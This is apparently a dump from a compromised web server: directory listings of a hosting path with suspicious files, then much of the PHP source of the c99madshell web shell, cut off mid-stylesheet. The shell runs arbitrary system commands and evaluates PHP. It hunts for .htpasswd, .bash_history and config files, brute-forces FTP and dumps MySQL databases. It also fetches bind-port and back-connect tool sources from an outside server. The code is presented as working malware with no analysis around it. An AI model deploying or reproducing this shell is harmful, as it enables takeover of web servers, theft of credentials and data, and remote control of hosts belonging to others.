while($r = mysql_fetch_row($result)){ foreach ($r as $key=>$value){ $response[$i][$key] = $value; } $i++; } return $response; mysql_free_result($result); } public function query($q) { mysql_query($q); } public function __destruct() { @mysql_close($this->link); } } function showLog($log_type = PROC_LOG) { $file = get_ar_file($log_type.LOG_EXT); if($file){ foreach($file as $log){ echo htmlspecialchars($log).BR; } } } function preDownloadLogs() { if (file_exists(ARCH)){ unlink(ARCH); } $output = exec( 'tar -czvf '.ARCH.' process.log connect.log' ); if (is_null ( $output )) { echo "error gzip"; } else { echo "<pre>log package <b>".ARCH."</b> created</pre>"; echo "<a href='".ARCH."'>download logs</a>"; } } function dbg_prn($s, $fl= DBG) { if($fl) { $pre = $post = NULL; $pre = '<PRE>'; $post ='</PRE>'; echo $pre; print_r($s); echo $post.PHP_EOL; }} class Log{ static function write($mess="", $name="info_error"){ if(strlen(trim($mess)) < 2){ return FALSE; } if(preg_match("/^([_a-z0-9A-Z]+)$/i", $name, $matches)){ $text = $mess.PHP_EOL; $filename = $name.LOG_EXT; if(!is_writable($filename)) { dbg_prn('Is NOT writable file '.$filename);return FALSE; } if (!$handle = fopen($filename, "a+")) {dbg_prn('Cannot open file '.$filename);return FALSE;} @flock ($handle, LOCK_EX); if(fwrite ($handle, $text)=== FALSE ) {dbg_prn('Cannot write to file '.$filename);return FALSE;} @flock ($handle, LOCK_UN); if (!fclose($handle)) {dbg_prn('Cannot close file '.$filename); return FALSE;} return TRUE; }else{return FALSE;} } } function get_ar_file($name) { $mas = Array(); if(is_readable($name)) { $handle = fopen($name, 'r'); if($handle){ while (!feof($handle)) { $mas[]= trim(fgets($handle)); } fclose($handle); }else{ dbg_prn("BAD FILE :".$name); return NULL; } $handle = NULL; return $mas; }else{ dbg_prn('FILE :'.$name.' is not a readable'); return NULL; } } function make_seed() { list($usec, $sec) = explode(' ', microtime()); return (float) $sec + ((float) $usec * 100000); } ?> </div> </body> </html>
other files:
-rw-r--r-- 1 wwwrun www 2922 Apr 2 2013 connect.log -rwxrwxrwx 1 1000 1000 39481 Mar 28 2013 links.txt -rwxrwxrwx 1 1000 1000 23690 Mar 29 2013 links1.txt -rwxrwxrwx 1 1000 1000 1834 Apr 1 2013 pass.txt -rw-r--r-- 1 wwwrun www 21741 Apr 2 2013 process.log -rw-r--r-- 1 wwwrun www 0 Apr 2 2013 reverse.log
login-116.hoststar.ch
/home/www/confixx/html/include/template/templates_c
-rw-r--r-- 1 wwwrun www 8650 May 21 2014 0x1.jpg -rw-r--r-- 1 wwwrun www 45101 May 21 2014 2014.zip -rwxr-xr-x 1 wwwrun www 45 May 8 2014 a.sh -rw-r--r-- 1 wwwrun www 12084 May 7 2014 caps.php -rw-r--r-- 1 web335 web335 44285 May 7 2014 maz.php -rw-r--r-- 1 wwwrun www 144201 May 8 2014 nomad4.php -rw-r--r-- 1 wwwrun www 64512 May 21 2014 rcon.exe
nomad4.php
<?php if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} error_reporting(5); @ignore_user_abort(TRUE); @set_magic_quotes_runtime(0); $win = strtolower(substr(PHP_OS,0,3)) == "win"; define("starttime",getmicrotime()); if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} $_REQUEST = array_merge($_COOKIE,$_POST); foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} $shver = "2.0 madnet edition"; if (empty($surl)) { $surl = $_SERVER['PHP_SELF']; } $surl = htmlspecialchars($surl); $timelimit = 0; $host_allow = array("*"); $login_txt = "Admin area"; $accessdeniedmess = "<a href=\"http://securityprobe.net\">c99madshell v.".$shver."</a>: access denied"; $gzipencode = TRUE; $c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server $filestealth = TRUE; $donated_html = "<center><b>Owned by root</b></center>"; $donated_act = array(""); $curdir = "./"; $tmpdir = ""; $tmpdir_log = "./"; $log_email = "user@host.gov"; $sort_default = "0a"; $sort_save = TRUE; $ftypes = array( "html"=>array("html","htm","shtml"), "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), "exe"=>array("sh","install","bat","cmd"), "ini"=>array("ini","inf"), "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), "sdb"=>array("sdb"), "phpsess"=>array("sess"), "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") ); $exeftypes = array( getenv("PHPRC")." -q %f%" => array("php","php3","php4"), "perl %f%" => array("pl","cgi") ); $regxp_highlight = array( array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), array("config.php",1) // example ); $safemode_diskettes = array("a"); $hexdump_lines = 8; $hexdump_rows = 24; $nixpwdperpage = 100; $bindport_pass = "c99mad"; $bindport_port = "31373"; $bc_port = "31373"; $datapipe_localport = "8081"; if (!$win) { $cmdaliases = array( array("-----------------------------------------------------------", "ls -la"), array("find all suid files", "find / -type f -perm -04000 -ls"), array("find suid files in current dir", "find . -type f -perm -04000 -ls"), array("find all sgid files", "find / -type f -perm -02000 -ls"), array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), array("find config.inc.php files", "find / -type f -name config.inc.php"), array("find config* files", "find / -type f -name \"config*\""), array("find config* files in current dir", "find . -type f -name \"config*\""), array("find all writable folders and files", "find / -perm -2 -ls"), array("find all writable folders and files in current dir", "find . -perm -2 -ls"), array("find all service.pwd files", "find / -type f -name service.pwd"), array("find service.pwd files in current dir", "find . -type f -name service.pwd"), array("find all .htpasswd files", "find / -type f -name .htpasswd"), array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), array("find all .bash_history files", "find / -type f -name .bash_history"), array("find .bash_history files in current dir", "find . -type f -name .bash_history"), array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), array("list file attributes on a Linux second extended file system", "lsattr -va"), array("show opened ports", "netstat -an | grep -i listen") ); } else { $cmdaliases = array( array("-----------------------------------------------------------", "dir"), array("show opened ports", "netstat -an") ); } $sess_cookie = "c99shvars"; $usefsbuff = TRUE; $copy_unset = FALSE; $quicklaunch = array( array("<b><hr>HOME</b>",$surl), array("<b><=</b>","#\" onclick=\"history.back(1)"), array("<b>=></b>","#\" onclick=\"history.go(1)"), array("<b>UPDIR</b>","#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='%upd';document.todo.sort.value='%sort';document.todo.submit();"), array("<b>Search</b>","#\" onclick=\"document.todo.act.value='search';document.todo.d.value='%d';document.todo.submit();"), array("<b>Buffer</b>","#\" onclick=\"document.todo.act.value='fsbuff';document.todo.d.value='%d';document.todo.submit();"), array("<b>Tools</b>","#\" onclick=\"document.todo.act.value='tools';document.todo.d.value='%d';document.todo.submit();"), array("<b>Proc.</b>","#\" onclick=\"document.todo.act.value='processes';document.todo.d.value='%d';document.todo.submit();"), array("<b>FTP brute</b>","#\" onclick=\"document.todo.act.value='ftpquickbrute';document.todo.d.value='%d';document.todo.submit();"), array("<b>Sec.</b>","#\" onclick=\"document.todo.act.value='security';document.todo.d.value='%d';document.todo.submit();"), array("<b>SQL</b>","#\" onclick=\"document.todo.act.value='sql';document.todo.d.value='%d';document.todo.submit();"), array("<b>PHP-code</b>","#\" onclick=\"document.todo.act.value='eval';document.todo.d.value='%d';document.todo.submit();"), array("<b>Self remove</b>","#\" onclick=\"document.todo.act.value='selfremove';document.todo.submit();"), array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()") ); $highlight_background = "#c0c0c0"; $highlight_bg = "#FFFFFF"; $highlight_comment = "#6A6A6A"; $highlight_default = "#0000BB"; $highlight_html = "#1300FF"; $highlight_keyword = "#007700"; $highlight_string = "#000000"; @$f = $_REQUEST["f"]; @extract($_REQUEST["c99shcook"]); ///////////////////////////////////// @set_time_limit(0); $tmp = array(); foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} $s = "!^(".implode("|",$tmp).")$!i"; if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://securityprobe.net\">c99madshell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} if (!empty($login)) { if (empty($md5_pass)) {$md5_pass = md5($pass);} if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) { if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |<br>"," ",$donated_html));} header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); header("HTTP/1.0 401 Unauthorized"); exit($accessdeniedmess); } } if (isset($_POST['act'])) $act = $_POST['act']; if (isset($_POST['d'])) $d = urldecode($_POST['d']); if (isset($_POST['sort'])) $sort = $_POST['sort']; if (isset($_POST['f'])) $f = $_POST['f']; if (isset($_POST['ft'])) $ft = $_POST['ft']; if (isset($_POST['grep'])) $grep = $_POST['grep']; if (isset($_POST['processes_sort'])) $processes_sort = $_POST['processes_sort']; if (isset($_POST['pid'])) $pid = $_POST['pid']; if (isset($_POST['sig'])) $sig = $_POST['sig']; if (isset($_POST['base64'])) $base64 = $_POST['base64']; if (isset($_POST['fullhexdump'])) $fullhexdump = $_POST['fullhexdump']; if (isset($_POST['c'])) $c = $_POST['c']; if (isset($_POST['white'])) $white = $_POST['white']; if (isset($_POST['nixpasswd'])) $nixpasswd = $_POST['nixpasswd']; $lastdir = realpath("."); chdir($curdir); $sess_data = unserialize($_COOKIE["$sess_cookie"]); if (!is_array($sess_data)) {$sess_data = array();} if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} $disablefunc = @ini_get("disable_functions"); if (!empty($disablefunc)) { $disablefunc = str_replace(" ","",$disablefunc); $disablefunc = explode(",",$disablefunc); } if (!function_exists("c99_buff_prepare")) { function c99_buff_prepare() { global $sess_data; global $act; foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} $sess_data["copy"] = array_unique($sess_data["copy"]); $sess_data["cut"] = array_unique($sess_data["cut"]); sort($sess_data["copy"]); sort($sess_data["cut"]); if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} } } c99_buff_prepare(); if (!function_exists("c99_sess_put")) { function c99_sess_put($data) { global $sess_cookie; global $sess_data; c99_buff_prepare(); $sess_data = $data; $data = serialize($data); setcookie($sess_cookie,$data); } } foreach (array("sort","sql_sort") as $v) { if (!empty($_POST[$v])) {$$v = $_POST[$v];} } if ($sort_save) { if (!empty($sort)) {setcookie("sort",$sort);} if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} } if (!function_exists("str2mini")) { function str2mini($content,$len) { if (strlen($content) > $len) { $len = ceil($len/2) - 2; return substr($content, 0,$len)."...".substr($content,-$len); } else {return $content;} } } if (!function_exists("view_size")) { function view_size($size) { if (!is_numeric($size)) {return FALSE;} else { if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} else {$size = $size . " B";} return $size; } } } if (!function_exists("fs_copy_dir")) { function fs_copy_dir($d,$t) { $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $h = opendir($d); while (($o = readdir($h)) !== FALSE) { if (($o != ".") and ($o != "..")) { if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} if (!$ret) {return $ret;} } } closedir($h); return TRUE; } } if (!function_exists("fs_copy_obj")) { function fs_copy_obj($d,$t) { $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); if (!is_dir(dirname($t))) {mkdir(dirname($t));} if (is_dir($d)) { if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} return fs_copy_dir($d,$t); } elseif (is_file($d)) {return copy($d,$t);} else {return FALSE;} } } if (!function_exists("fs_move_dir")) { function fs_move_dir($d,$t) { $h = opendir($d); if (!is_dir($t)) {mkdir($t);} while (($o = readdir($h)) !== FALSE) { if (($o != ".") and ($o != "..")) { $ret = TRUE; if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} if (!$ret) {return $ret;} } } closedir($h); return TRUE; } } if (!function_exists("fs_move_obj")) { function fs_move_obj($d,$t) { $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); if (is_dir($d)) { if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} return fs_move_dir($d,$t); } elseif (is_file($d)) { if(copy($d,$t)) {return unlink($d);} else {unlink($t); return FALSE;} } else {return FALSE;} } } if (!function_exists("fs_rmdir")) { function fs_rmdir($d) { $h = opendir($d); while (($o = readdir($h)) !== FALSE) { if (($o != ".") and ($o != "..")) { if (!is_dir($d.$o)) {unlink($d.$o);} else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} } } closedir($h); rmdir($d); return !is_dir($d); } } if (!function_exists("fs_rmobj")) { function fs_rmobj($o) { $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); if (is_dir($o)) { if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} return fs_rmdir($o); } elseif (is_file($o)) {return unlink($o);} else {return FALSE;} } } if (!function_exists("myshellexec")) { function myshellexec($cmd) { global $disablefunc; $result = ""; if (!empty($cmd)) { if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} elseif (($result = `$cmd`) !== FALSE) {} elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_resource($fp = popen($cmd,"r"))) { $result = ""; while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp); } } return $result; } } if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} if (!function_exists("view_perms")) { function view_perms($mode) { if (($mode & 0xC000) === 0xC000) {$type = "s";} elseif (($mode & 0x4000) === 0x4000) {$type = "d";} elseif (($mode & 0xA000) === 0xA000) {$type = "l";} elseif (($mode & 0x8000) === 0x8000) {$type = "-";} elseif (($mode & 0x6000) === 0x6000) {$type = "b";} elseif (($mode & 0x2000) === 0x2000) {$type = "c";} elseif (($mode & 0x1000) === 0x1000) {$type = "p";} else {$type = "?";} $owner["read"] = ($mode & 00400)?"r":"-"; $owner["write"] = ($mode & 00200)?"w":"-"; $owner["execute"] = ($mode & 00100)?"x":"-"; $group["read"] = ($mode & 00040)?"r":"-"; $group["write"] = ($mode & 00020)?"w":"-"; $group["execute"] = ($mode & 00010)?"x":"-"; $world["read"] = ($mode & 00004)?"r":"-"; $world["write"] = ($mode & 00002)? "w":"-"; $world["execute"] = ($mode & 00001)?"x":"-"; if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} return $type.join("",$owner).join("",$group).join("",$world); } } if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} if (!function_exists("parse_perms")) { function parse_perms($mode) { if (($mode & 0xC000) === 0xC000) {$t = "s";} elseif (($mode & 0x4000) === 0x4000) {$t = "d";} elseif (($mode & 0xA000) === 0xA000) {$t = "l";} elseif (($mode & 0x8000) === 0x8000) {$t = "-";} elseif (($mode & 0x6000) === 0x6000) {$t = "b";} elseif (($mode & 0x2000) === 0x2000) {$t = "c";} elseif (($mode & 0x1000) === 0x1000) {$t = "p";} else {$t = "?";} $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); } } if (!function_exists("parsesort")) { function parsesort($sort) { $one = intval($sort); $second = substr($sort,-1); if ($second != "d") {$second = "a";} return array($one,$second); } } if (!function_exists("view_perms_color")) { function view_perms_color($o) { if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";} elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";} else {return "<font color=green>".view_perms(fileperms($o))."</font>";} } } if (!function_exists("c99getsource")) { function c99getsource($fn) { global $c99sh_sourcesurl; $array = array( "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", "c99sh_bindport.c" => "c99sh_bindport_c.txt", "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", "c99sh_backconn.c" => "c99sh_backconn_c.txt", "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", ); $name = $array[$fn]; if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} else {return FALSE;} } } if (!function_exists("mysql_dump")) { function mysql_dump($set) { global $shver; $sock = $set["sock"]; $db = $set["db"]; $print = $set["print"]; $nl2br = $set["nl2br"]; $file = $set["file"]; $add_drop = $set["add_drop"]; $tabs = $set["tabs"]; $onlytabs = $set["onlytabs"]; $ret = array(); $ret["err"] = array(); if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} if (empty($db)) {$db = "db";} if (empty($print)) {$print = 0;} if (empty($nl2br)) {$nl2br = 0;} if (empty($add_drop)) {$add_drop = TRUE;} if (empty($file)) { $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; } if (!is_array($tabs)) {$tabs = array();} if (empty($add_drop)) {$add_drop = TRUE;} if (sizeof($tabs) == 0) { // retrive tables-list $res = mysql_query("SHOW TABLES FROM ".$db, $sock); if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} } $out = "# Dumped by C99madShell.SQL v. ".$shver." # Home page: http://securityprobe.net # # Host settings: # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." # Date: ".date("d.m.Y H:i:s")." # DB: \"".$db."\" #--------------------------------------------------------- "; $c = count($onlytabs); foreach($tabs as $tab) { if ((in_array($tab,$onlytabs)) or (!$c)) { if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} // recieve query for create table structure $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); if (!$res) {$ret["err"][] = mysql_smarterror();} else { $row = mysql_fetch_row($res); $out .= $row["1"].";\n\n"; // recieve table variables $res = mysql_query("SELECT * FROM `$tab`", $sock); if (mysql_num_rows($res) > 0) { while ($row = mysql_fetch_assoc($res)) { $keys = implode("`, `", array_keys($row)); $values = array_values($row); foreach($values as $k=>$v) {$values[$k] = addslashes($v);} $values = implode("', '", $values); $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; $out .= $sql; } } } } } $out .= "#---------------------------------------------------------------------------------\n\n"; if ($file) { $fp = fopen($file, "w"); if (!$fp) {$ret["err"][] = 2;} else { fwrite ($fp, $out); fclose ($fp); } } if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} return $out; } } if (!function_exists("mysql_buildwhere")) { function mysql_buildwhere($array,$sep=" and",$functs=array()) { if (!is_array($array)) {$array = array();} $result = ""; foreach($array as $k=>$v) { $value = ""; if (!empty($functs[$k])) {$value .= $functs[$k]."(";} $value .= "'".addslashes($v)."'"; if (!empty($functs[$k])) {$value .= ")";} $result .= "`".$k."` = ".$value.$sep; } $result = substr($result,0,strlen($result)-strlen($sep)); return $result; } } if (!function_exists("mysql_fetch_all")) { function mysql_fetch_all($query,$sock) { if ($sock) {$result = mysql_query($query,$sock);} else {$result = mysql_query($query);} $array = array(); while ($row = mysql_fetch_array($result)) {$array[] = $row;} mysql_free_result($result); return $array; } } if (!function_exists("mysql_smarterror")) { function mysql_smarterror($type,$sock) { if ($sock) {$error = mysql_error($sock);} else {$error = mysql_error();} $error = htmlspecialchars($error); return $error; } } if (!function_exists("mysql_query_form")) { function mysql_query_form() { global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; $sql_query = urldecode($sql_query); if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} if ((!$submit) or ($sql_act)) { echo "<table border=0><tr><td><form method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>"; if ($tbl_struct) { echo "<td valign=\"top\"><b>Fields:</b><br>"; foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";} echo "</td></tr></table>"; } } if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} } } if (!function_exists("mysql_create_db")) { function mysql_create_db($db,$sock="") { $sql = "CREATE DATABASE `".addslashes($db)."`;"; if ($sock) {return mysql_query($sql,$sock);} else {return mysql_query($sql);} } } if (!function_exists("mysql_query_parse")) { function mysql_query_parse($query) { $query = trim($query); $arr = explode (" ",$query); /*array array() { "METHOD"=>array(output_type), "METHOD1"... ... } if output_type == 0, no output, if output_type == 1, no output if no error if output_type == 2, output without control-buttons if output_type == 3, output with control-buttons */ $types = array( "SELECT"=>array(3,1), "SHOW"=>array(2,1), "DELETE"=>array(1), "DROP"=>array(1) ); $result = array(); $op = strtoupper($arr[0]); if (is_array($types[$op])) { $result["propertions"] = $types[$op]; $result["query"] = $query; if ($types[$op] == 2) { foreach($arr as $k=>$v) { if (strtoupper($v) == "LIMIT") { $result["limit"] = $arr[$k+1]; $result["limit"] = explode(",",$result["limit"]); if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} unset($arr[$k],$arr[$k+1]); } } } } else {return FALSE;} } } if (!function_exists("c99fsearch")) { function c99fsearch($d) { global $found; global $found_d; global $found_f; global $search_i_f; global $search_i_d; global $a; if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $h = opendir($d); while (($f = readdir($h)) !== FALSE) { if($f != "." && $f != "..") { $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); if (is_dir($d.$f)) { $search_i_d++; if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} if (!is_link($d.$f)) {c99fsearch($d.$f);} } else { $search_i_f++; if ($bool) { if (!empty($a["text"])) { $r = @file_get_contents($d.$f); if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} else {$bool = strpos(" ".$r,$a["text"],1);} if ($a["text_not"]) {$bool = !$bool;} if ($bool) {$found[] = $d.$f; $found_f++;} } else {$found[] = $d.$f; $found_f++;} } } } } closedir($h); } } if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} //Sending headers @ob_start(); @ob_implicit_flush(0); function onphpshutdown() { global $gzipencode,$ft; if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) { $v = @ob_get_contents(); @ob_end_clean(); @ob_start("ob_gzHandler"); echo $v; @ob_end_flush(); } } function c99shexit() { onphpshutdown(); exit; } header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); header("Cache-Control: no-store, no-cache, must-revalidate"); header("Cache-Control: post-check=0, pre-check=0", FALSE); header("Pragma: no-cache"); if (empty($tmpdir)) { $tmpdir = ini_get("upload_tmp_dir"); if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} } $tmpdir = realpath($tmpdir); $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} else {$tmpdir_logs = realpath($tmpdir_logs);} if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = TRUE; $hsafemode = "<font color=red>ON (secure)</font>"; } else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";} $v = @ini_get("open_basedir"); if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";} else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";} $sort = htmlspecialchars($sort); if (empty($sort)) {$sort = $sort_default;} $sort[1] = strtolower($sort[1]); $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"#\" onclick=\"document.todo.act.value='phpinfo';document.todo.submit();\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE)); @ini_set("highlight.bg",$highlight_bg); //FFFFFF @ini_set("highlight.comment",$highlight_comment); //#FF8000 @ini_set("highlight.default",$highlight_default); //#0000BB @ini_set("highlight.html",$highlight_html); //#000000 @ini_set("highlight.keyword",$highlight_keyword); //#007700 @ini_set("highlight.string",$highlight_string); //#DD0000 if (!is_array($actbox)) {$actbox = array();} $dspact = $act = htmlspecialchars($act); $disp_fullpath = $ls_arr = $notls = null; $ud = urlencode($d); ?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - c99madshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; 